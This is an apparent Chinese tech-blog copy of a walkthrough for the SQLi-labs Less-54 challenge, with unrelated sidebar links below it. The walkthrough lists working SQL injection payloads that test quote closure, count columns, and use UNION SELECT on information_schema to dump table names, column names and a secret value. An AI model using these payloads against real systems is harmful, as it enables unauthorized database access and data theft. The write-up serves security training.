当前位置:网站首页>SQL injection Less54 (limited number of SQL injection + union injection)
SQL injection Less54 (limited number of SQL injection + union injection)
2022-07-31 22:52:00 【HUAWEI CLOUD】
Limited number of SQL injections
Each reset, the table name of the database, field names and data will change
?id=1
?id=1'
No error message found
?id=1"
The echo is normal, check the closing method at the beginning of double quotation marks directly
?id=1'--+?id=1')--+?id=1'))--+
The single quote echo is normal, so it is closed by the single quote
?id=1' order by 3--+ The echo is normal?id=1' order by 4--+ The echo is wrong
So there are three columns
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+
?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
边栏推荐
- TypeScript 的组件
- linux view redis version command (linux view mysql version number)
- The latest masterpiece!Alibaba just released the interview reference guide (Taishan version), I just brushed it for 29 days
- 了解下C# 匿名方法
- Daily practice——Randomly generate an integer between 1-100 and see how many times you can guess.Requirements: The number of guesses cannot exceed 7 times, and after each guess, it will prompt "bigger"
- useragent online lookup
- ThreadLocal
- 基于单片机GSM的防火防盗系统的设计
- SQL注入 Less38(堆叠注入)
- (26)Blender源码分析之顶层菜单的关于菜单
猜你喜欢
C程序设计-方法与实践(清华大学出版社)习题解析
Payment module implementation
AI automatic code writing plugin Copilot (co-pilot)
Bionic caterpillar robot source code
Go mode tidy reports an error go warning “all” matched no packages
数据分析(一)——matplotlib
ECCV 2022 Huake & ETH propose OSFormer, the first one-stage Transformer framework for camouflaging instance segmentation!The code is open source!...
Drawing process of hand-drawn map of scenic spots
Flink_CDC construction and simple use
Implementing a Simple Framework for Managing Object Information Using Reflection
随机推荐
Unity-通过预制件和克隆方法动态实现各个UGUI下控件的创建和显示
什么是客户画像管理?
Bika LIMS open source LIMS set - use of SENAITE (detection process)
Judging decimal points and rounding of decimal operations in Golang
[Code Hoof Set Novice Village 600 Questions] Leading to the combination of formulas and programs
I don't know what to do with sync issues
Components of TypeScript
VOT2021比赛简介
JS basic exercises
新产品如何进行网络推广?
spark reports an error OutOfMemory "recommended collection"
Niuke.com brush questions (1)
Daily practice——Randomly generate an integer between 1-100 and see how many times you can guess.Requirements: The number of guesses cannot exceed 7 times, and after each guess, it will prompt "bigger"
基于simulink的Active anti-islanding-AFD主动反孤岛模型仿真
Collation of knowledge points in Ningbo University NBU IT project management final exam
@JsonFormat(pattern="yyyy-MM-dd") time difference problem
Program processes and threads (concurrency and parallelism of threads) and basic creation and use of threads
A high-quality WordPress download site template theme developed abroad
Realize serial port receiving data based on STM32 ring queue
ICML2022 | 深入研究置换敏感的图神经网络